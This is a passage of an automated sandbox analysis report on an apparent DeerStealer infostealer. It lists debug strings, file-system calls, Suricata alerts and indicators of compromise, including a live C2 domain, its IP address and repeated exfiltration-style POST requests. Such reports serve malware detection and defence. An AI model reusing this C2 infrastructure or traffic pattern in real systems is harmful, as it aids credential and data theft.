00000009.00000002.2016220829.0000000006BB7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008693611.0000000003DB9000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010487344.0000000004BB1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012805216.00000000059B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2013670109.0000000005DBE000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2014130874.0000000005FB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Network.pdb source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.1732196243.0000000004996000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732831266.0000000005270000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: ActiveISO.exe, 00000003.00000002.1462470445.000001918E740000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000002.1462216320.000001918E345000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1530200810.000001B256293000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529317938.000001B255C97000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529694254.000001B256090000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009396599.00000000043B5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008251395.00000000039B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012194200.00000000055B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008941462.0000000003FB2000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010789316.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2007277559.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009614238.00000000045B0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2016220829.0000000006BB7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008693611.0000000003DB9000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010487344.0000000004BB1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012805216.00000000059B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2013670109.0000000005DBE000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2014130874.0000000005FB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: ActiveISO.exe, 00000003.00000002.1466012295.00007FFBAA858000.00000002.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000004.00000002.1533059618.00007FFBA8CB8000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, 00000005.00000002.1732196243.0000000004996000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732831266.0000000005270000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: ActiveISO.exe, 00000003.00000002.1464563770.00007FFBAA336000.00000002.00000001.01000000.0000000D.sdmp, ActiveISO.exe, 00000003.00000003.1449494448.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1531483502.00007FFBA81A6000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb source: ActiveISO.exe, 00000003.00000002.1468035111.00007FFBAB070000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1534561084.00007FFBAA2A0000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: ActiveISO.exe, 00000003.00000002.1469464951.00007FFBBBDA1000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 00000003.00000003.1454101928.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1534844762.00007FFBBB3E1000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: ActiveISO.exe, 00000003.00000002.1467038697.00007FFBAAE41000.00000002.00000001.01000000.0000000A.sdmp, ActiveISO.exe, 00000004.00000002.1533860035.00007FFBA92A1000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\sharefolders.pdb source: BkTwXj17DH.exe, 00000002.00000002.1473759971.000000007000A000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdb source: ActiveISO.exe, 00000003.00000002.1468524264.00007FFBAB641000.00000020.00000001.01000000.00000008.sdmp, ActiveISO.exe, 00000004.00000002.1534211751.00007FFBA94B1000.00000020.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbF source: ActiveISO.exe, 00000003.00000002.1463442325.00007FFBA9C7C000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 00000004.00000002.1531943131.00007FFBA869C000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdbH source: ActiveISO.exe, 00000003.00000002.1468524264.00007FFBAB641000.00000020.00000001.01000000.00000008.sdmp, ActiveISO.exe, 00000004.00000002.1534211751.00007FFBA94B1000.00000020.00000001.01000000.00000013.sdmp

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	0_2_004C3CC4
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_00504440 FindFirstFileW,FindClose,	0_2_00504440
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	0_2_004D9B43
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F7B87 FindFirstFileExW,	0_2_004F7B87
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D94440 FindFirstFileW,FindClose,	2_2_00D94440
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D87B87 FindFirstFileExW,	2_2_00D87B87
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D69B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_00D69B43
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D53CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00D53CC4
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_70002863 FindFirstFileExW,	2_2_70002863
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF5C50 #8,FindFirstFileW,FindClose,	2_2_6FFF5C50
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EA370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,	3_2_00007FFBAA2EA370
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815A370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,	4_2_00007FFBA815A370

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.8:58020 -> 188.114.96.3:443

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58009 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58013 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58010 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58021 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58023 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58017 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58015 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58019 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58016 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58020 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58026 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58014 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58025 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58011 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58018 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58028 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58027 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58022 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58029 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58024 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Content-Length: 96Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 53Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 208Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 681457Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 745Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 212Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 380Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 35Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 95675Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 35Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Content-Length: 96Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 53Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 208Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 681457Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 745Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 212Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 380Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 35Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 95622Host: sirnisirlo.online
Source: global traffic	HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 35Host: sirnisirlo.online

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp

String found in binary or memory: 04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1email.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06www.google.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3login.yahoo.com39:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:293e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:71e9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:47login.skype.com92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43addons.mozilla.orgb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0login.live.comd8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0global trustee05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56*.google.com0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4cDigiNotar Root CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Services CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services 1024 CA0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Root CA G2a4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21CertiID Enterprise Certificate Authority5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41DigiNotar Qualified CA46:9c:2c:b007:27:10:0dDigiNotar Cyber CA07:27:0f:f907:27:10:0301:31:69:b0DigiNotar PKIoverheid CA Overheid en Bedrijven01:31:34:bfDigiNotar PKIoverheid CA Organisatie - G2d6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar Extended Validation CA1e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Public CA 202546:9c:2c:af46:9c:3c:c907:27:14:a9Digisign Server ID (Enrich)4c:0e:63:6aDigisign Server ID - (Enrich)72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0UTN-USERFirst-Hardware41MD5 Collisions Inc. (http://www.phreedom.org/md5)08:27*.EGO.GOV.TR08:64e-islem.kktcmerkezbankasi.org03:1d:a7AC DG Tr equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: sirnisirlo.online

Source: unknown

HTTP traffic detected: POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Content-Length: 96Host: sirnisirlo.online

Source: BkTwXj17DH.exe	String found in binary or memory: http://appsyndication.org/2006/appsyn
